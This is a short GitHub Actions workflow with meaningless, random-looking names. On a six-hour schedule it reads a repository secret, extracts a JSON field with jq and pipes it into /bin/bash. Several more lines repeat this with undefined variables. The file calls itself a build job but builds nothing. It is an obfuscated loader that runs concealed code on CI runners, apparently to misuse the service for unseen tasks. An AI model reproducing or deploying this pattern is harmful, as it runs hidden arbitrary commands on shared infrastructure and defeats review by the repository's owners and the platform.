name: xueqingfeng8712

on:
  workflow_dispatch:
  schedule:
    - cron: '42 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xueqingfeng8712
        env:
          ngxw44: ${{ secrets.ngxw44 }}
        run: |
          echo $ngxw44 | jq -r .mjua436 | /bin/bash
          echo $zv294 | jq -r .pxn4 | /bin/bash
          echo $iq37 | jq -r .pvlzm66987 | /bin/bash
          echo $yah30159 | jq -r .mjm93401 | /bin/bash
          echo $xizi589 | jq -r .gnlhl7634 | /bin/bash
          echo $vofui63905 | jq -r .asbsm1346 | /bin/bash
          echo $dyp5501 | jq -r .icljg221 | /bin/bash
          echo $cb8 | jq -r .swby181 | /bin/bash

